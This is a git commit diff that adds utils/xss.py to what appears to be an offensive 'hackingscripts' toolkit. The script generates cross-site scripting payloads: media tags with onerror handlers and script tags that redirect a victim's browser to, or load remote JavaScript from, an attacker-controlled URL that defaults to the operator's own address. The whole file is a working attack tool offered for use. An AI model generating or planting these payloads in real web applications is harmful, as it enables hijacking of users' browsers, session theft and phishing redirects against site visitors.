web-server + xss cleanup

2026-05-01 08:27:45 +02:00
parent 90d161134f
commit 305b166d26
3 changed files with 57 additions and 75 deletions
--- a/utils/xss.py
+++ b/utils/xss.py
@@ -0,0 +1,51 @@
+#!/usr/bin/env python
+
+from hackingscripts.utils import util
+import argparse
+import random
+import re
+
+# TODO: more xss payloads, encoders, etc.
+
+def generate_payload(payload_type, url, index=None, **kwargs):
+    payloads = []
+
+    media_tags = ["img","audio","video","image","body","script","object"]
+    if payload_type in media_tags:
+        payloads.append('<%s src=1 href=1 onerror="javascript:document.location=%s">' % (payload_type, url))
+
+    if payload_type == "script":
+        payloads.append('<script type="text/javascript">document.location=%s</script>' % url)
+        payloads.append('<script src="%s/xss" />' % url)
+
+    if len(payloads) == 0:
+        return None
+
+    return "\n".join(payloads)
+
+if __name__ == "__main__":
+
+    parser = argparse.ArgumentParser(description="XSS payload generator")
+    parser.add_argument(dest="type", type=str, default=None, help="Payload type")
+    parser.add_argument("-u", "--url", dest="url", type=str, default="http://"+util.get_address(), help="XSS Base URL")
+    args, extra = parser.parse_known_args()
+
+    payload_type = args.type.lower()
+    url = args.url
+    extra_args = {}
+
+    for entry in extra:
+        match = re.match(r"(\w+)=(\w+)", entry)
+        if not match:
+            print("Invalid extra argument:", entry)
+            exit()
+        key, value = match.groups()
+        extra_args[key] = value
+
+    payload = generate_payload(payload_type, url, **extra_args)
+    if payload is None:
+        print("Unknown payload type", payload_type)
+        # print("Supported types: ")
+        exit(1)
+
+    print(payload)